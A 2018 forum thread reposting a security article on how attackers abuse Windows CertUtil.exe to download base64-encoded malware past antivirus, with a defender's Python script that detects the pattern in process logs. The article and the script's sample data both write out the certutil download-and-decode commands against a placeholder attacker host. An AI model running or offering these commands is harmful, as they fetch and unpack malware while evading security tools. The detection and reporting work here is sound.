WALLONN7 Posted April 4, 2018

CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV

Windows has a built-in program called CertUtil, which can be used to manage certificates in Windows. Using this program you can install, back up, delete, manage, and perform various functions related to certificates and certificate stores in Windows.

One of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL and save it as a local file using the syntax "certutil.exe -urlcache -split -f output.file".

Security researcher Casey Smith tweeted in 2017 his concerns that this method could be used to download malware. Smith's concerns were warranted, as attackers have been utilizing CertUtil to download malware for quite a while. This sample utilized it in 2016, and a recent Trojan from March 2018 also utilizes it to download various batch files and scripts to an infected computer.

CertUtil being used in a recent Trojan

You may be wondering why attackers would use CertUtil when they already have a foothold on a computer. This is because some computers may be locked down so that unknown applications are unable to download programs. By using a built-in Windows program, there is a possibility that CertUtil would be whitelisted by installed security programs and thus be allowed to download files. This utilization of legitimate Windows programs to download and execute malware is not new, as the Windows regsvr32.exe executable can be used in a similar manner.

Using CertUtil+Base64 to Bypass Security Software

Today security consultant and ISC Handler Xavier Mertens published a handler diary that adds a twist to the use of CertUtil that may make it easier for attackers' downloads to remain undetected by edge security devices. This is to first base64 encode the malicious file so it appears as harmless text and then decode it after it has been downloaded using CertUtil.exe.
As already discussed, you can download a file using CertUtil.exe by using the following command:

certutil.exe -urlcache -split -f [URL] output.file

This will download the file in its original form and save it to the computer. The problem with this method is that network security devices can detect the file as malicious and block it.

To get past this, Mertens came up with the idea of first base64 encoding the malicious file so that to an edge device it just appears as harmless text. Then, once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file into the executable. This is illustrated in Mertens' handler diary.

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

This method potentially gets it past an edge device without being detected and then allows it to be converted back into the executable on the local machine, where it may not be as secure.

While I had not known of this actually being used in the wild, MalwareHunterTeam told me that the use of certutil.exe -decode is already being used. Examples can be seen in these samples. In addition, post-publication, we also discovered this write-up from F5 Labs detailing a campaign using CertUtil.exe to install coinminers on Windows. Furthermore, Kaspersky security researcher Fabio Assolini alerted us that this method has been used by Brazilian coders for some time.

https://twitter.com/assolini/status/981608599100289024

As you can see, new tricks are thought up every day utilizing what would normally be safe and legitimate Windows programs. For those who are not using CertUtil to access remote certificates or servers, you may want to lock down its ability to connect to the Internet.

Update 4/4/18 15:13 EST: Updated to include more information about this method being used in the wild.

Source
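The two-step pattern in the post (a "-urlcache -split -f" download followed by "-decode" of the same file) is easy to spot in process-creation telemetry, which is where a defender would look for it. The following is an added detection example written for this thread; it is not code from the article, from Mertens' diary or from any vendor. It assumes process-creation records (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) have been exported as "image | command line" text lines; the sample records are constructed for the example and the host names and paths in them are placeholders.

```python
"""Detect the CertUtil download / decode pattern in process-creation records.

Added example for this thread, not code from the article or the forum.
Input format assumed: one record per line, "<image path> | <command line>",
as a SIEM or Sysmon export might produce. Sample records are constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample records: legitimate certutil use, unrelated processes,
# the two-step pattern from the post, and a renamed copy of the binary.
SAMPLE_EVENTS = [
    r'C:\Windows\System32\certutil.exe | certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt',
    r'C:\Windows\System32\certutil.exe | certutil.exe -decode bad.txt bad.exe',
    r'C:\Windows\System32\certutil.exe | certutil.exe -store My',
    r'C:\Windows\System32\cmd.exe | cmd.exe /c dir',
    r'C:\Temp\cu.exe | cu.exe -urlcache -split -f http://example.test/x.txt x.txt',
]

URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


@dataclass
class Finding:
    image: str        # full path of the process image
    stage: str        # "download" (-urlcache with a URL) or "decode" (-decode/-decodehex)
    args: List[str]   # positional arguments in command-line order
    renamed: bool     # True when the image is not named certutil.exe


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def classify_certutil(image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line uses CertUtil's download or decode switches.

    certutil accepts switches with '-' or '/' and is case-insensitive, so
    both forms are normalised. Matching on switches rather than on the image
    name also catches a renamed copy of the binary; that case is flagged.
    """
    toks = tokenize(cmdline)
    if not toks:
        return None
    switches = {t[1:].lower() for t in toks[1:] if t[:1] in '-/' and len(t) > 1}
    positional = [t for t in toks[1:] if t[:1] not in '-/']
    renamed = not image.lower().endswith('certutil.exe')
    if 'urlcache' in switches and any(URL_RE.match(p) for p in positional):
        return Finding(image, 'download', positional, renamed)
    if 'decode' in switches or 'decodehex' in switches:
        return Finding(image, 'decode', positional, renamed)
    return None


def scan(events: List[str]) -> List[Finding]:
    """Run the classifier over exported 'image | command line' records."""
    findings = []
    for rec in events:
        image, _, cmdline = rec.partition(' | ')
        f = classify_certutil(image.strip(), cmdline.strip())
        if f:
            findings.append(f)
    return findings


def chained_decodes(findings: List[Finding]) -> List[Tuple[Finding, Finding]]:
    """Pair each download with a later -decode whose input is the download's output file.

    A download followed by a decode of the same file is the exact sequence
    the post describes and deserves a higher severity than either alone.
    """
    downloaded = {}
    pairs = []
    for f in findings:
        if f.stage == 'download' and len(f.args) >= 2:
            downloaded[f.args[-1].lower()] = f   # last positional = output file
        elif f.stage == 'decode' and f.args:
            src = f.args[0].lower()              # first positional = input file
            if src in downloaded:
                pairs.append((downloaded[src], f))
    return pairs


if __name__ == '__main__':
    found = scan(SAMPLE_EVENTS)
    for f in found:
        flag = ' (renamed binary!)' if f.renamed else ''
        print(f'{f.stage:8} {f.image}{flag} args={f.args}')
    for dl, dec in chained_decodes(found):
        print(f'CHAIN: {dl.args[-1]} downloaded then decoded to {dec.args[-1]}')
```

Running the block prints three findings and one chained download/decode pair for bad.txt. Security 4688 only carries the command line when the "Include command line in process creation events" policy is enabled, so without that (or Sysmon) the -urlcache and -decode switches are not visible to this logic at all.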
straycat19 Posted April 5, 2018

Won't work on any of my systems. Software restriction policy prevents it from running unless I temporarily turn it off. For all of you that believe AV software protects your system, it only will if you can restrict the files that it allows to run, and you don't need extra software to do that; just edit your GPO.
DKT27 (Administrator) Posted April 5, 2018

@WALLONN7: You need to fix those links there.
WALLONN7 (Author) Posted April 5, 2018

2 hours ago, DKT27 said:
@WALLONN7: You need to fix those links there.

Edited... 1+ for letting me know... The strange thing is that there was no problem at the time of the posting, and the same was seen when I was notified of the first response in the topic...
DKT27 (Administrator) Posted April 5, 2018

6 minutes ago, WALLONN7 said:
Edited... 1+ for letting me know... The strange thing is that there was no problem at the time of the posting, and the same was seen when I was notified of the first response in the topic...

You still need to fix the source link. The logs show only you have edited it, and only once, which you did right now to fix those links here.
WALLONN7 (Author) Posted April 5, 2018

7 minutes ago, DKT27 said:
You still need to fix the source link. The logs show only you have edited it, and only once, which you did right now to fix those links here.

Fixed... "In all these years in this vital industry, this is the first time that this happens to me"...